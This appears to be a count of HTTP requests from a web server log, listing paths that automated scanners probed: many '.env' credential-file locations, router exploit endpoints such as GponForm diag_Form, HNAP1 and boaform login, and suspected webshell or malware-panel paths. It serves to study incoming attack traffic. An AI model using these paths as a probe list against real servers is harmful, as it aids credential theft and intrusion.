1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/conf/.env`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
2	GET	`/download/.env`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/lib/.env`	HTTP/1.1
1	GET	`/library/.env`	HTTP/1.1
1	GET	`/main/.env`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/newsite/.env`	HTTP/1.1
1	GET	`/nmaplowercheck1683313355`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/redmine/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
2	GET	`/src/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
2	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/vod/3383.html`	HTTP/1.1
2	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/admin`	HTTP/1.1
1	POST	`/app`	HTTP/1.1
1	POST	`/apps`	HTTP/1.1
1	POST	`/base`	HTTP/1.1
1	POST	`/blogs`	HTTP/1.1
6	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin`	HTTP/1.1
1	POST	`/conf`	HTTP/1.1
1	POST	`/database`	HTTP/1.1
2	POST	`/download`	HTTP/1.1
1	POST	`/lib`	HTTP/1.1
1	POST	`/library`	HTTP/1.1
1	POST	`/main`	HTTP/1.1
1	POST	`/new`	HTTP/1.1
1	POST	`/newsite`	HTTP/1.1
1	POST	`/old`	HTTP/1.1
1	POST	`/protected`	HTTP/1.1
1	POST	`/public`	HTTP/1.1
1	POST	`/redmine`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/shared`	HTTP/1.1
1	POST	`/site`	HTTP/1.1
2	POST	`/src`	HTTP/1.1
2	POST	`/vendor/laravel`	HTTP/1.1
1	POST	`/vendor`	HTTP/1.1
1	PRI	`*`	HTTP/2.0